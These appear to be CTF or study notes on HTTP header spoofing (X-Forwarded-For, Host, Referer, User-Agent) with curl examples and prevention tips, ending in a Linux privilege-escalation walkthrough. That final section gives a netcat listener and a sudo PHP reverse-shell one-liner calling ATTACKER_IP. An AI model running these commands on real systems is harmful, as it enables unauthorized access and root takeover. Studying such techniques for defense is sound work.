HTTP Header (X-Forwarded-For)
๐น What is the X-Forwarded-For Header?
- It is an HTTP header that stores the original IP address of a client when a request passes through a proxy or load balancer.
- Web servers use this header for security and access control.
๐น The Exploit
- The challenge is to bypass an access restriction on a web page.
- The server checks for a specific IP address in the
X-Forwarded-Forheader to grant access. - By modifying the header manually, the user tricks the server into believing they are an authorized user.
๐น Steps to Exploit
- Use cURL or a proxy tool (e.g., Burp Suite) to inspect the request headers.
- Modify the
X-Forwarded-Forheader value to localhost (127.0.0.1). - Submit the request again.
- The server mistakenly grants access.
Prevention Tips
Use authentication mechanisms instead of relying on IP-based filtering.
Implement server-side validation to ensure the header isnโt blindly trusted.
HTTP Header Attacks
1. Commonly Exploited HTTP Headers
๐น X-Forwarded-For (XFF)
- Used to store the original IP address of a client behind a proxy.
- Attackers can spoof their IP to bypass access restrictions.
๐ก Example Attack:
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com/admin
๐น If the server trusts this header for authentication, the attacker gets access!
๐น Host Header Injection
- Some websites determine site functionality based on the
Hostheader. - Attackers can modify it to redirect users, bypass authentication, or exploit SSRF.
Example Attack:
curl -H "Host: evil.com" http://target.com
๐น If the application relies on Host to generate links, an attacker might be able to redirect traffic to a malicious site.
Prevention:
- Always use whitelisted hostnames in your application.
- Avoid relying on the
Hostheader for authentication.
Referer Header Manipulation
- Some web applications allow or deny access based on the
Refererheader. - Attackers can fake it to bypass CSRF (Cross-Site Request Forgery) protection.
๐ก Example Attack:
curl -H "Referer: http://trusted-site.com" http://target.com/secure-page
๐น If the site only checks the referer and not proper authentication, the attacker gains access!
โ Prevention:
- Do NOT rely solely on referer headers for security.
- Use CSRF tokens instead.
๐น User-Agent Spoofing
- Web applications sometimes restrict access based on the browser type (User-Agent).
- Attackers can change their User-Agent to impersonate another device or bot.
Example Attack:
curl -H "User-Agent: Googlebot" http://target.com/hidden-page
๐น Some sites grant special access to search engines (like Googlebot). If not verified properly, an attacker can exploit it.
โ Prevention:
- Verify User-Agent strings by checking the request origin IP.
- Use CAPTCHAs for additional validation.
Linux Privilege Escalation using PHP
๐น The Exploit
- The user gains SSH access to a low-privilege account.
- They discover that the user “Alice” can execute PHP as root.
- By running a PHP reverse shell, they escalate privileges to root access.
๐น Steps to Exploit
Check for misconfigured sudo permissions:
sudo -l
- Output shows that Alice can run PHP with root privileges.
Set up a listener on the attackerโs machine:
nc -lvnp 4545
Run a reverse shell payload on the target machine:
sudo php -r '$sock=fsockopen("ATTACKER_IP",4545);exec("/bin/sh -i <&3 >&3 2>&3");'
The attacker now has root access to the system.
